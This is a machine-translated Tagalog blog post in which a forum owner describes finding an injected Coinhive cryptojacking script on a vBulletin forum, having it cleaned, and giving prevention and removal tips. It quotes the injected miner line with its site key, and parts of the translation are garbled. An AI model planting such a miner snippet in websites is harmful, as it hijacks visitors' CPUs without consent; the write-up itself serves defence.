Paano mag-alis ng Coinhive crypto-mining script mula sa iyong website

Karaniwan kong binibisita ang forum araw-araw at hindi ko nakita ito sa araw bago. Kaya ipinapalagay ko na ito ay nangyari ng ilang oras sa gabi, ang aking oras, nang ako ay natutulog.

Gumagamit ako ng vBulletin software para sa forum, at na-update ito sa pinakabagong bersyon. Bukod pa rito, ito ay kamangha-mangha para sa amin, habang ang domain ng TheWindowsClub.com ay gumagamit ng Sucuri Web Antivirus & Firewall upang maprotektahan ang sarili mula sa mga online na pagbabanta at pag-atake sa web.

sa aking Windows 10 na computer. Sinusuri ko sa iba pang mga browser tulad ng Chrome & Edge, at ang mga resulta ay pareho.

Pagkatapos ng pag-click sa kanan sa forum ng web page at pagsuri sa source code, nakita ko na ito ay isang malisyosong script ng CryptoMiner ng CoinHive.

Ito ang nakakahamak na Coinhive Javascript na nakuha ko sa aking code ng forum:

var miner = bagong CoinHive.Anonymous ("FG1d35B2h5xqzgJW0bbfyHT22ud9RnEm"); miner.start ();

Anyway, ang unang bagay na ginawa ko ay forum down at ipaalam sa Sucuri.

Ang Sucuri folks ay nalinis ang forum ng Coinhive script na nakuha sa aking forum sa loob ng ilang oras, at ang lahat ng ay mainam.

What is CoinHive

Coinhive offers isang minero ng JavaScript para sa monero cryptocurrency na maaari mong i-embed sa iyong website at gamitin ang CPU ng mga bisita sa website ng mga computer upang mina ang mga barya para sa iyo.

Ito ay tinatawag na Cryptojacking . Ito ay nagsasangkot ng pag-hijack sa mga browser ng gumagamit para sa pagmimina ng cryptocurrency. Ang ilang mga may-ari ng website ay maaaring gamitin ito sa kanilang sarili upang gumawa ng pera - ngunit sa aming kaso, ito ay nakuha na injected.

Kapag nag-access ang isang gumagamit sa nahawaang site, ang Coinhive JavaScript ay nagpapatupad at mga mina Monero gamit ang mga mapagkukunang CPU ng user. Ito ay maaaring humantong sa pag-throttling ng CPU at hindi inaasahang pag-crash ng sistema ng makina ng biktima.

Ngayon kung ang iyong browser ay nahawaan, makikita mo ang paggamit ng iyong mapagkukunan na umakyat. Isara ang browser, at i-drop ito. Ang user ay maaaring mapansin ang kanyang pagpainit ng makina, ang tagahanga na tumatakbo nang mabilis o mabilis na pag-ulan ng baterya.

Tinanong ko ang aking kasamahan na si Saurabh Mukhekar upang bisitahin ang aking forum gamit ang kanyang Mac at tingnan kung ano ang nangyari. Well, ang kanyang Mac computer ay naapektuhan rin kapag binuksan niya ang forum sa Safari! Isa siya sa mga matalinong gumagamit ng Mac OSX na gumagamit ng isang antivirus software para sa kanyang Mac. Ang kanyang Avast antivirus para sa Mac ay matagumpay na tumigil sa malisyosong script mula sa pagtakbo.

Said Saurabh,

CoinHive malware ay hindi lamang nag-hijack sa isang Windows PC kundi pati na rin ang Mac, dahil ito ay browser na nakabatay sa Javascript infection. Mabuti na hindi ako naniniwala sa gawa-gawa na ang mga Mac ay hindi kailangan ng isang antivirus software, kung hindi man ay ang aking makina ay nahawaan at ang aking Mac ay patuloy na bumabati ng mga barya para sa ibang tao.

Pigilan ang CoinHive mula sa pag-infect sa iyong website

1. Huwag gamitin ang anumang mga template ng NULL o mga plugin sa iyong website / forum.
2. Panatilihin ang iyong CMS na-update sa pinakabagong bersyon
3. I-update ang iyong hosting software ng madalas (PHP, Database,I-secure ang iyong website sa mga provider ng web security tulad ng Sucuri, Cloudflare, Wordfence, atbp.
4. Kumuha ng mga pangunahing pag-iingat upang ma-secure ang iyong blog.
5. CoinHive miner pagtanggal mula sa website

Una sa lahat, kailangan mong maging webmaster ng

Ngayon kapag nakita ng iyong antivirus ang impeksiyon ng CoinHive, i-right click sa web page at piliin ang

Tingnan ang Source Code. Susunod na pindutin ang Ctrl + F at hanapin ang "CoinHive". Sa sandaling nakilala mo ang lokasyon ng malisyosong code, kailangan mong makita ang posisyon nito - kung saan ito matatagpuan. Ngayon ay kailangan mong alisin ito nang mano-mano. Upang gawin ito, kailangan mo ng kaunting coding na kaalaman sa iyong platform. Kakailanganin mong hanapin ang mga nahawaang file / s at mano-manong tanggalin sa itaas ang script mula rito. Kung hindi ka sigurado tungkol dito, mangyaring humingi ng ilang eksperto upang gawin ito. Dahil ginagamit namin ang Sucuri, ipinapaalam namin sa kanila na gawin ito.

Sa paggawa nito, i-clear ang cache ng iyong server at browser. Kung gumagamit ka ng anumang plugin ng cache o sabihin ang MaxCDN, i-clear din ang mga cache.

Protektahan ang iyong sarili laban sa crypto mining scripts

Cryptocurrencies & Blockchain technology ay kumukuha sa buong mundo. Ito ay lumilikha ng isang epekto sa pandaigdigang ekonomiya at nagiging sanhi din ng mga pagkagambala sa teknolohiya. Ang bawat tao`y nagsimula na nakatuon sa naturang isang kapaki-pakinabang na merkado - at kasama dito ang mga hacker ng website. Bilang pagtaas ng pagtaas, dapat naming asahan na ang ganitong mga teknolohiya ay hindi magagamit. Iyon ang madilim na bahagi ng anumang umuusbong na teknolohiya.

Kung ano ang magagawa natin ay gawin ang pinakamahusay na posibleng pag-iingat sa lahat ng oras. Bukod sa paggamit ng isang mahusay na software ng seguridad, gumamit ng extension ng Chrome o Firefox na hinaharangan ang mga website mula sa paggamit ng iyong CPU upang mamahala ng Cryptocurrency - o mas mahusay pa, gamitin ang Anti-WebMiner na hihinto sa pag-atake ng Cryptojacking Pagmimina Script sa pamamagitan ng pagbabago ng iyong file ng Host. Gumagana ito sa lahat ng mga browser. Kung ikaw ay gumagamit ng Mac, mangyaring kumuha ng software ng antivirus para sa iyong computer.

Kung gaano kalaki ang pag-iingat, kung nararamdaman mo na ikaw ay may bumisita sa isang nahawaang site, magiging magandang ideya na i-clear ang iyong browser cache at i-scan ang iyong makina gamit ang iyong antivirus software pati na rin ang AdwCleaner.

Manatiling ligtas, manatiling alerto!